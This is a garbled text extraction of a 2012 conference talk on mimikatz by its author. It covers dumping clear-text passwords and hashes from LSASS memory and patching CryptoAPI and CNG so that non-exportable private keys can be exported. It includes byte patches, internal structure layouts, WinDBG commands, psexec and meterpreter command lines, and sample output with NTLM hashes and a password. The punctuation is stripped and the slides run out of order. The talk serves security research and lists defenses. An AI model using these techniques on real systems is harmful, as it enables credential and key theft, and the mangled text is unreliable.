text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsahistory of laquo pass-the- raquo 22
Pass-the-passndash 052011 ndash mimikatz 10 dumps first clear text passwords from TsPkg provider (but limited to NT
6 and some XP SP3)bull httpbloggentilkiwicomsecuritepass-the-pass
ndash 052011 ndash return of mimikatz it dumps clear text passwords from WDigest provider (unlimited this time ))
bull httpbloggentilkiwicomsecuritere-pass-the-pass
ndash 052011 ndash Some organizations opened cases to Microsoft about ithellip
hellipLots of timehellip
ndash begin of 2012 - Lots of blogs (and Kevin Mitnick )) say few words about mimikatz
ndash 032012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extracthellip
bull httpseclistsorgpen-test2012Mar7
ndash 032012 ndash mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
bull httpbloggentilkiwicomsecuriterere-pass-the-pass
ndash 032012 ndash yeah once againhellip more curious but Kerberos keeps passwords in memorybull httpbloggentilkiwicomsecuritererere-pass-the-pass
ndash 082012 ndash sekurlsa module without injection at all (ultra safe)bull httpbloggentilkiwicomsecuritemimikatzsekurlsa-fait-son-apparition
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 9
mimikatz sekurlsa tspkg
because sometimes hash is not enoughhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 10
mimikatz sekurlsa tspkgwhat is it
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquosexperiencendash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation)ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 11
mimikatz sekurlsa tspkgquestions
KB says that for it works we must enable laquo Default credentials raquo delegationndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellipndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCredsbull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos)bull Client NO password is sent to serverhellip
So password resides somewhere in memory
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 12
mimikatz sekurlsa tspkgsymbols amp theory
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenariondash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 13
kdgt x tspkgclear75016d1c tspkgTSObtainClearCreds = ltno type informationgtkdgt x tspkgpassword75011b68 tspkgTSDuplicatePassword = ltno type informationgt75011cd4 tspkgTSHidePassword = ltno type informationgt750195ee tspkgTSRevealPassword = ltno type informationgt75012fbd tspkgTSUpdateCredentialsPassword = ltno type informationgtkdgt x tspkglocate7501158b tspkgTSCredTableLocateDefaultCreds = ltno type informationgt
mimikatz sekurlsa tspkgworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 14
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_TS_CREDENTIAL
KIWI_TS_PRIMARY_CREDENTIAL
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL PVOID unk0LSA_UNICODE_STRING DomaineLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING Password
KIWI_TS_PRIMARY_CREDENTIAL PKIWI_TS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
tspkgTSGlobalCredTable
typedef struct _KIWI_TS_CREDENTIAL ifdef _M_X64
BYTE unk0[108]elif defined _M_IX86
BYTE unk0[64]endif
LUID LocallyUniqueIdentifierPVOID unk1PVOID unk2PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary
KIWI_TS_CREDENTIAL PKIWI_TS_CREDENTIALKIWI_TS_CREDEN
TIAL
mimikatz sekurlsa tspkgdemo time
sekurlsatspkg
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 15
mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16
mimikatz sekurlsa wdigestwhat is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquoWikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web sitendash Authenticated client access using SASLndash Authenticated client access with integrity protection to a directory service
using LDAPrdquoMicrosoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashesndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17
mimikatz sekurlsa wdigestwhat is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18
mimikatz sekurlsa wdigesttheory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digestndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemoryndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemoryndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in argsbull Protect it with LsaProtectMemorybull Update or insert data in double linked list wdigestl_LogSessList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigestworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flinkstruct _KIWI_WDIGEST_LIST_ENTRY BlinkDWORD UsageCountstruct _KIWI_WDIGEST_LIST_ENTRY ThisLUID LocallyUniqueIdentifier[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password[hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigestdemo time
sekurlsawdigest
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21
mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22
mimikatz sekurlsa livessphow
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23
0 kdgt process 0 0 lsassexePROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4
DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not AccessiblegtImage lsassexe
0 kdgt process i 83569040You need to continue execution (press g ltentergt) for the contextto be switched When the debugger breaks in again you will be inthe new process context0 kdgt gBreak instruction exception - code 80000003 (first chance)ntRtlpBreakWithStatusInstruction814b39d0 cc int 30 kdgt reload userLoading User Symbols0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g0 kdgt g
mimikatz sekurlsa livessphow
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24
lsasrvLsaProtectMemorylivesspLiveMakeSupplementalCredlivesspLiveMakeSecPkgCredentialslivesspLsaApLogonUserEx2livesspSpiLogonUserEx2
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2livesspLsaApLogonUserEx2 (74781536)[]livesspLsaApLogonUserEx2+0x560 (74781a96)call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livesspworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flinkstruct _KIWI_LIVESSP_LIST_ENTRY BlinkPVOID unk0PVOID unk1PVOID unk2PVOID unk3DWORD unk4DWORD unk5PVOID unk6LUID LocallyUniqueIdentifierLSA_UNICODE_STRING UserNamePVOID unk7PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSuppDWORD unk0LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26
Me yes
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
